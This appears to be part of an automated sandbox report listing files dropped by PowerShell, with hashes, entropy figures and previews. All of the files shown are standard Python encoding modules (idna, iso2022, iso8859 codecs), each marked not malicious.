                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10027
                                                                                                                                                                                                                      Entropy (8bit):4.492934350217829
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:g2wxhP5XBp7Z/J/8V2zbxofjEY7pKrlIRYUnIzSGAy4DYvRv3:gPvPjp7q2zbIbwDcGx
                                                                                                                                                                                                                      MD5:04477AE720F73BBAC7793082CC0DFC9C
                                                                                                                                                                                                                      SHA1:D29599BAC27431F1BC3CF2A45FD43FB7204C2599
                                                                                                                                                                                                                      SHA-256:0C2181970F9ED35031700453022EE123069DC207200BB2F74C340CC1B71BA0DE
                                                                                                                                                                                                                      SHA-512:BAC1387BC56D8AE123A2C5409884483A004EDDAF6C752651E53CEA54BDD34A605CBB9754F05207CB59EFD120E60E5483FD3ED6CEC0A181200DA26992B15503AD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:# This module implements the RFCs 3490 (IDNA) and 3491 (Nameprep)....import stringprep, re, codecs..from unicodedata import ucd_3_2_0 as unicodedata....# IDNA section 3.1..dots = re.compile("[\u002E\u3002\uFF0E\uFF61]")....# IDNA section 5..ace_prefix = b"xn--"..sace_prefix = "xn--"....# This assumes query strings, so AllowUnassigned is true..def nameprep(label):.. # Map.. newlabel = [].. for c in label:.. if stringprep.in_table_b1(c):.. # Map to nothing.. continue.. newlabel.append(stringprep.map_table_b2(c)).. label = "".join(newlabel).... # Normalize.. label = unicodedata.normalize("NFKC", label).... # Prohibit.. for c in label:.. if stringprep.in_table_c12(c) or \.. stringprep.in_table_c22(c) or \.. stringprep.in_table_c3(c) or \.. stringprep.in_table_c4(c) or \.. stringprep.in_table_c5(c) or \.. stringprep.in_table_c6(c) or \.. stringprep.in_table_c7(c) or
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1092
                                                                                                                                                                                                                      Entropy (8bit):4.599723694318225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:n9qdOz0f/XojmKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFplR:9qmFU62VJjRU8njOxLnrxLbrLKZJxTz
                                                                                                                                                                                                                      MD5:0607F8E6310A0B601897FF8EC76FF2C4
                                                                                                                                                                                                                      SHA1:3839A936E2792722D3F157F11965BF510241C0FA
                                                                                                                                                                                                                      SHA-256:7169767DD6732A80A0B665315588EF9CFF2DF4D495A86BC0BDD22B5C9F0644B9
                                                                                                                                                                                                                      SHA-512:C763E0D3AFA5DBB7FA96D03A52F0F5828A61E8FF24523BF62A852C989DD3BFBBFC3DA4535B5401A78E47FE16F3EA33364BA63655D91A6A12516315E231F23B15
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp.py: Python Unicode Codec for ISO2022_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                                                      Entropy (8bit):4.625134249310359
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nhq1Oz0f/XojglKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9CcJxFplR:hquF8J62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                                      MD5:4D2B0675DE1A9AFB3553B5D5E894020C
                                                                                                                                                                                                                      SHA1:A9B6F704D09F7A0B5182BE7C3581D321BA4DDA76
                                                                                                                                                                                                                      SHA-256:627D3BDB5D3BC70DD00E51199B689D1C225EFE747A2DB8D5938E6AF78263F572
                                                                                                                                                                                                                      SHA-512:AC8E08AA4A2235BF20C563EC1A466B666A39F09CCD4AE681CD34DCF51754E3B8C860D557354691D170ABCDE43029B3B45E5597AADDED398577F9A90C74FADC57
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp_1.py: Python Unicode Codec for ISO2022_JP_1..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_1')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_1',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                                                      Entropy (8bit):4.611453480597579
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nnSqgOz0f/Xoj7ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9VcJxFpz:nSq5F3t62VJjRU8njOxLnrxLbrLK0Jx/
                                                                                                                                                                                                                      MD5:A4798D8B5DEE38BCCF3CBEAD235F392E
                                                                                                                                                                                                                      SHA1:8971456D5A2C4A3255592399EE1141E119880774
                                                                                                                                                                                                                      SHA-256:DC680A0E34DCE73756F0E3B5CBB23DD819022BE7E10F80E55289A5EAB9ED7C2E
                                                                                                                                                                                                                      SHA-512:E329124E3ADA51C303556CA0C6B5B4644ED76E6F43C943BFE72F318928EF1DAA6121FE545480F4092F92B05CD25315D3E5B7ADB09E63985E9D8879BA3A751C2B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                                                                      Entropy (8bit):4.645190214359865
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:n8q1sOz0f/XojvKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9FcJxFplR:8qnF/62VJjRU8njOxLnrxLbrLKoJxTz
                                                                                                                                                                                                                      MD5:E1738D28D315C80A04908CDB21CBE7BD
                                                                                                                                                                                                                      SHA1:D79BC1E83E0A2103909A7AB97DB3A456D21C0711
                                                                                                                                                                                                                      SHA-256:C8CB592DF0CF38A6B7E8265C02D7784FB32052EF9AD94D0FF369889EDA540273
                                                                                                                                                                                                                      SHA-512:BFDF5D44B36916C3B828EA1C599E644CB9D3ADBC0D2D4922F016F9DDD7EB424F8A937C19FA3EFBA0E9F4AC14ADFF3C0BA6B924130ED2D050C3A9BDDC2F4165C2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp_2004.py: Python Unicode Codec for ISO2022_JP_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. increme
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                                                      Entropy (8bit):4.625134249310359
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nrq3Oz0f/XojUKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqkFa62VJjRU8njOxLnrxLbrLKnJxTz
                                                                                                                                                                                                                      MD5:3E98055A4B7D99A49798F3012C4D9DDB
                                                                                                                                                                                                                      SHA1:8579E49AA8080610BF40A51DC18B6DF5EEE56A2E
                                                                                                                                                                                                                      SHA-256:2A2AE4368D962C2E7B5DB2F29EE89EFD5A7FDB881DEF523C21670E0D1A1C50CE
                                                                                                                                                                                                                      SHA-512:DBA054816FC0022810D545D089BC62997BFE04143B579E59EF1DAD2D25DCAFC879BF00CADEA2DDF3CE850728E00911984590EA8C8C8D6EA1AF30F71AA97CEA76
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_3')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_3',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1108
                                                                                                                                                                                                                      Entropy (8bit):4.633181613509048
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:npqNOz0f/XojaKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ycJxFplR:pq2Fg62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                                      MD5:34E904E0F16F84EC0A001DFFCDE7514C
                                                                                                                                                                                                                      SHA1:19BCD8776FB3239A003F4B5F04B7056B81D0A6C6
                                                                                                                                                                                                                      SHA-256:5B4439C7DBE65638166A70C5404CABB72552019D1F497193C6689B86BD3C4C94
                                                                                                                                                                                                                      SHA-512:F9DC1EA03840BD9763BC2B1521D2557FD0111682D1FF805FCCDA123508C3F23768F819FA26B2E097447595F70ABCB2737C9B153B848D2687DB3E2E9E645801EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_jp_ext.py: Python Unicode Codec for ISO2022_JP_EXT..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_ext')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_ext',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incremental
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1092
                                                                                                                                                                                                                      Entropy (8bit):4.584383388529371
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJIBqqOz0f/XojfKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFpz:EqHFn62VJjRU8njOxLnrxLbrLKGJxTz
                                                                                                                                                                                                                      MD5:F907851FF35FB61EB485B2C163A2BCCB
                                                                                                                                                                                                                      SHA1:CA280AC9C832208B01242601F7F3A78803A1CDF9
                                                                                                                                                                                                                      SHA-256:FD9EFD7094361F6557D00857E332D7229E922597336A0714FB0FA2402C954029
                                                                                                                                                                                                                      SHA-512:4992572D79613856F84F7332C1D7C588B2BA4256613FCAB21BEF6C74BF8D50F2D96CAA2ABFF2C92D040DDFE45A328B7495BCB29CD51580577D5F5A5527CC469D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# iso2022_kr.py: Python Unicode Codec for ISO2022_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13483
                                                                                                                                                                                                                      Entropy (8bit):4.571059193460173
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:qHhsuOTDvRAUrXPLouhIAs2+ijLMZt6CJTd12:HTauhIAlEZt680
                                                                                                                                                                                                                      MD5:0466703A1EB5752CDD5115B2D738D822
                                                                                                                                                                                                                      SHA1:03354F0D1406A99B9934276675759C6002D4A901
                                                                                                                                                                                                                      SHA-256:CCFDBA207B483DCD38673D85B6E2A773A5BF64E8AE9DB7E90A01F8014E62B24A
                                                                                                                                                                                                                      SHA-512:3D7B957FF194B69AC9DE7FE59BD03DB29EBD076456FC93FD3E6AFB6B09EACB8C5D327A6E17719C02AE5F71E8428BB55FAB633955861699BC4FF90C3F80D0A783
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-1',.. encode
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13896
                                                                                                                                                                                                                      Entropy (8bit):4.591898710758108
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:OHhsuOTDvR4UrXPLouhIAs2+ijLWDf6z6iC:bTmuhIAleu+
                                                                                                                                                                                                                      MD5:28ADCF051DD15E45A38CE929864BBD83
                                                                                                                                                                                                                      SHA1:A09E4C13D00393CE6C2F3CF9665455D74BBF8A0A
                                                                                                                                                                                                                      SHA-256:76216C65399DE88B6D40E0BE3209ED7B14D6DD87AFB9C0A984ADDDD0CF6B559F
                                                                                                                                                                                                                      SHA-512:13A368308279E76F2D6C3AEF73B66AD4EF4A5A88098FF1A85B403C3C006B3925E25BBB72A6BAC1585CF90D60CF26ADE576CCE484A65E1AE0EC52467370D0507C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-10',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12642
                                                                                                                                                                                                                      Entropy (8bit):4.621611083140247
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:gHhsuOTDvRrUrXPLouhIAs2+ijLA00pC8i5I:dTpuhIAlBH8iG
                                                                                                                                                                                                                      MD5:8BE69EAC235E74EFCA68174DB8EA6352
                                                                                                                                                                                                                      SHA1:28447A4EC5A2111A8B370DECD143F45935EBC454
                                                                                                                                                                                                                      SHA-256:5E346F5769E0C3EEB6B5547B954481A821481A970AA8FEC33BFFBF07B880689A
                                                                                                                                                                                                                      SHA-512:2E4CB687855A577BDBA8665767BFDD29E95D0952C10C0DA9C2547659629C6DBCD7A95E9C821A1CED7CA4BE5600A95BAEA1D5383AFC9A491E3861A344F1FFAEFB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_11 generated from 'MAPPINGS/ISO8859/8859-11.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-11',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13578
                                                                                                                                                                                                                      Entropy (8bit):4.614312894970411
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:oHhsuOTDvRNUrXPLouhIAs2+ijLdyGeyd:1TXuhIAlQGeG
                                                                                                                                                                                                                      MD5:89E3297E11801E02B40A23B6180DCD25
                                                                                                                                                                                                                      SHA1:EB58BC97EEE69D9DB6670CD439C684057B7A3937
                                                                                                                                                                                                                      SHA-256:BEE45734B991C04E76C2ABA2BA8C7208F6BA743324D815DE95965945643D8084
                                                                                                                                                                                                                      SHA-512:F8AF2186EC0C3CE5B391999280086ADFD3882425269ECFBCA4D70A33907CE42A1F8F6949D9BE2937FB92300A8235667611DECD358C7E0F8273858B72ADF56CB3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-13',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13959
                                                                                                                                                                                                                      Entropy (8bit):4.584053979506915
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:mHhsuOTDvR0UrXPLouhIAs2+ijLXwwTdW:DTKuhIAlvwkW
                                                                                                                                                                                                                      MD5:445A9BD974736A30077C9BF14106E805
                                                                                                                                                                                                                      SHA1:85E673B1E179E5886765F6051ED2F9235063F2F8
                                                                                                                                                                                                                      SHA-256:C498772FADF244077B650E468E7922AE1C0DB74ED6984A2A81BC0E088631F0F9
                                                                                                                                                                                                                      SHA-512:0D8D322C1DCCB5F2169F402CB82875A10D725F65DFBDE6E70515839CFC8451DD58DD5F938AED1DE25A2C1E74ACEADC7E07889F81C98808ECDE2F6F24D5C73D89
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_14 generated from 'MAPPINGS/ISO8859/8859-14.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-14',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13519
                                                                                                                                                                                                                      Entropy (8bit):4.566581461339518
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QHhsuOTDvRnUrXPLouhIAs2+ijLhFsVN6ATdo56G:NTNuhIAl5Fsto
                                                                                                                                                                                                                      MD5:0D2C4FB1B7CCD0D085108F651A041593
                                                                                                                                                                                                                      SHA1:947AF7C07B789EB743031C3C108BB2FDB882F673
                                                                                                                                                                                                                      SHA-256:D703D64AE2D23602E38C2F387EEFFD5D4E5792209BC3CE64928FEE2F99DCD906
                                                                                                                                                                                                                      SHA-512:3B24DE05424FBEFC09C8B3743DEA37C4AFEDE5C68A96D0721622D28A6AD42B47D2BB28011F39E6B89AD14B893DB545572537EC741090B880414C26CDF8845EDA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_15 generated from 'MAPPINGS/ISO8859/8859-15.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-15',.. enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13864
                                                                                                                                                                                                                      Entropy (8bit):4.596808715275571
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:fiHhsuOTDvRf+UrXPLouhIAs2+ijLOSVCXKm:fvT4uhIAlznm
                                                                                                                                                                                                                      MD5:6ED16EE5F05DE02F25349CEBA19AFF51
                                                                                                                                                                                                                      SHA1:B036FA26C737669AB311D450BE274CE57845EB9C
                                                                                                                                                                                                                      SHA-256:F49FFF248546D510F7ECB5FC2C25C9B68925A2F483B938035CD7A54957A560A2
